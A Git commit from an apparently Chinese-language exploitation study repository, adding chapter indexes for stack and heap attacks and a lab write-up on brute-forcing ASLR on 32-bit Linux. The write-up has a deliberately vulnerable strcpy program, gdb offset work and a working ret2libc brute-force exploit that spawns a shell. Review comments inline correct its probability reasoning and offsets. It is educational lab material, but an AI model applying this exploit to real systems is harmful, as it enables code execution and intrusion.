
Commit 3177a46

author
Sn0rt
committed Mar 20, 2017
update: with new post of stack
1 parent b128e14 commit 3177a46

File tree

4 files changed

+961
-0
lines changed


‎chapter2/README.md

Lines changed: 25 additions & 0 deletions
@@ -1 +1,26 @@
11
# 栈的安全
2+
3+
4+
## 基本的漏洞利用
5+
6+
[format strings on linux32](./format-strings.md)
7+
8+
[Integer-overflow on Linux32](./integer-overflow.md)
9+
10+
[off by one on linux32](./off-by-one.md)
11+
12+
## 对抗基于栈上的安全机制
13+
14+
### NX
15+
16+
[ret2libc bypass nx on linux32](./linux-x86-ret2libc.md)
17+
18+
[rop on Linux32](./linux-x86-rop.md)
19+
20+
[rop chain on linux32](./linux-x86-rop-chain.md)
21+
22+
## ASLR
23+
24+
[got overwrite bypass aslr on linux32](./overwrite-got-bypass-aslr.md)
25+
26+
[brute force bypass aslr on linux32](./brute-force-bypass-aslr.md)
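Review bot: the heading levels in this hunk are inconsistent. "### NX" sits under "## 对抗基于栈上的安全机制" as a stack-protection mechanism being bypassed, but "## ASLR" is promoted to level 2, so the ASLR links no longer appear under that section; suggest "### ASLR" so NX and ASLR are siblings. Minor: link titles mix "linux32" and "Linux32" (e.g. "[Integer-overflow on Linux32]" next to "[off by one on linux32]"); pick one spelling.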

‎chapter2/brute-force-bypass-aslr.md

Lines changed: 131 additions & 0 deletions
@@ -0,0 +1,131 @@
1+
# 0x00 beginning
2+
3+
记录学暴力破解 32 位 Linux bypass ASLR 的过程, 实验部分来自`sploitfun`[^origin].
4+
5+
>What is brute-force?
6+
7+
在这个技术中攻击者随意选择一个`libc`的基地址来持续攻击直到成功, 这个技术是最简单`bypass`的 ASLR 的方法, 当然需要一定运气.
8+
9+
演示代码如下:
10+
11+
```shell
12+
// gcc -fno-stack-protector
13+
// echo 2 > /proc/sys/kernel/randomize_va_space
14+
15+
#include <stdio.h>
16+
#include <string.h>
17+
18+
int main(int argc, char* argv[]) {
19+
char buf[256];
20+
strcpy(buf,argv[1]);
21+
printf("%s\n",buf);
22+
fflush(stdout);
23+
return 0;
24+
}
25+
```
26+
27+
# 0x01 analysis
28+
29+
当地址随机化开启时候, 发现可以 libc 的每次加载地址都不一样, 但是有规律可循.
30+
31+
```shell
32+
Sn0rt@warzone:~/lab$ ldd ./aslr_2|grep libc
33+
libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb7580000)
34+
Sn0rt@warzone:~/lab$ ldd ./aslr_2|grep libc
35+
libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb75c5000)
36+
Sn0rt@warzone:~/lab$ ldd ./aslr_2|grep libc
37+
libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb7612000)
38+
Sn0rt@warzone:~/lab$ ldd ./aslr_2|grep libc
39+
libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb753d000)
40+
Sn0rt@warzone:~/lab$ ldd ./aslr_2|grep libc
41+
libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb7563000)
42+
Sn0rt@warzone:~/lab$ ldd ./aslr_2|grep libc
43+
libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb755a000)
44+
Sn0rt@warzone:~/lab$ ldd ./aslr_2|grep libc
45+
libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb757d000)
46+
Sn0rt@warzone:~/lab$ ldd ./aslr_2|grep libc
47+
libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb75c7000)
48+
Sn0rt@warzone:~/lab$ ldd ./aslr_2|grep libc
49+
libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb7564000)
50+
Sn0rt@warzone:~/lab$ ldd ./aslr_2|grep libc
51+
libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb7553000)
52+
```
53+
54+
`libc`随机化只变化 0xb75 后面的两个数字, 因此最大尝试次数 256(2^8) 次时某次随机化的地址总可能又一次被用到, 在下面的`exp`选择`libc`的起始基地址`0xb7595000`进行多次尝试.
55+
56+
# 0x02 how to use?
57+
58+
exp 中 offset 的偏移还是用 peda 套路! offset 是 268.
59+
60+
其中`system_arg`我是利用`libc`中"/bin/sh"相对于`system()`在 libc 中的偏移计算的, 利用 gdb`print`两个然后减法运算就可以, 具体操作如下
61+
62+
```shell
63+
gdb-peda$ p system
64+
$1 = {<text variable, no debug info>} 0xb7e63190 <__libc_system>
65+
gdb-peda$ searchmem "bin/sh" libc
66+
Searching for 'bin/sh' in: libc ranges
67+
Found 1 results, display max 1 items:
68+
libc : 0xb7f83a25 ("bin/sh")
69+
gdb-peda$ ^Z
70+
[1]+ Stopped gdb -q aslr_2
71+
Sn0rt@warzone:~/lab$ python
72+
Python 2.7.6 (default, Mar 22 2014, 22:59:38)
73+
[GCC 4.8.2] on linux2
74+
Type "help", "copyright", "credits" or "license" for more information.
75+
>>> hex(0xb7f83a25-0xb7e63190)
76+
'0x120895L'
77+
>>>
78+
```
79+
80+
参数填充 exp:
81+
82+
```python
83+
#!/usr/bin/env python
84+
85+
from subprocess import call
86+
from pwn import p32
87+
88+
libc_base_addr = 0xb7595000
89+
exit_offset = 0x000331e0
90+
system_offset = 0x00040190
91+
92+
system_addr = libc_base_addr + system_offset
93+
exit_addr = libc_base_addr + exit_offset
94+
95+
system_arg = system_addr + 0x00120894
96+
97+
payload = "A" * 268 + p32(system_addr) + p32(exit_addr) + p32(system_arg)
98+
99+
i = 0
100+
while (i < 256):
101+
print "Number of tries: %d" %i
102+
ret = call(["./aslr_2", payload])
103+
i += 1
104+
```
105+
其实这里 exp 已经完成了, 不过如果成功过后有点扫尾工作需要做, 把尾部加上
106+
107+
```python
108+
ret = call(["./aslr_2", payload])
109+
i += 1
110+
if (not ret):
111+
break
112+
else:
113+
print "Exploit failed"
114+
```
115+
116+
```shell
117+
...
118+
Number of tries: 79
119+
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�Q]���\�$Zo
120+
$ uid=1042(Sn0rt) gid=1043(Sn0rt) groups=1043(Sn0rt)
121+
$
122+
```
123+
需要多运行几次, 有时候会执行失败, 或者执行成功没有会显示.
124+
125+
# 0x03 doubt
126+
127+
这个技术利用了在同一个`libc`文件中函数偏移是相对的构造出 shellcode, 因此我填写的`libc`基地址又一次命中, 下面攻击就水到渠成, 按照理论这个脚本一次就可以命中`libc`, 为什么需要多次执行才能 get shell?
128+
129+
### reference
130+
131+
[^origin]: [sploitfun](https://sploitfun.wordpress.com/2015/05/08/bypassing-aslr-part-ii/)
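Review bot: the claim in 0x01 that 256 tries will always land on the chosen base 0xb7595000 is wrong, and the question in 0x03 follows from it: the ldd output shows the libc base is drawn independently on each run from about 256 candidate values, so a fixed guess hits with probability roughly 1/256 per attempt and 256 attempts succeed only about 1-(255/256)^256 ≈ 63% of the time. Suggest stating that explicitly and letting the loop run until success instead of stopping at 256. Two related points in the script: the gdb session computes 0x120895 but the exp uses 0x00120894 with no explanation (searchmem matched "bin/sh", so the full "/bin/sh" string starts one byte earlier; say so, or search for "/bin/sh" directly), and `if (not ret): break` cannot detect a successful run because the chain returns from system() into exit() with system_arg as its argument, so the exit status is the low byte of that address rather than 0, which is why a shell can appear without the loop stopping. Also the first code fence is tagged ```shell but contains C source; tag it ```c.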

‎chapter2/overwrite-got-bypass-aslr.md

Lines changed: 785 additions & 0 deletions

‎chapter3/README.md

Lines changed: 20 additions & 0 deletions
@@ -1 +1,21 @@
11
# 堆安全
2+
3+
## Linux 下基本的堆管理机制
4+
5+
[ptmalloc2](./ptmalloc2.md)
6+
7+
8+
## 套路研习
9+
10+
[heap overflow using unlink on linux32](./linux-x86-unlink.md) 过期!
11+
12+
[heap overflow with using malloc maleficarum on linux32](./heap-overflow-uisng-malloc-maleficarum.md)
13+
14+
[off-by-one vulnerability (heap based) on linux32](./linux-x86-off-by-one.md) 过期!
15+
16+
[use after free on linux32](./linux-x86-UAF.md) 主流!
17+
18+
19+
20+
21+
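Review bot: the hunk appends five empty lines (new lines 17 through 21) after the last link; drop them, since trailing blank lines add nothing and the other README in this commit ends directly after its last entry. Also check the link target `./heap-overflow-uisng-malloc-maleficarum.md`: "uisng" looks like a typo for "using", and the link will 404 unless the file is actually named that way.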
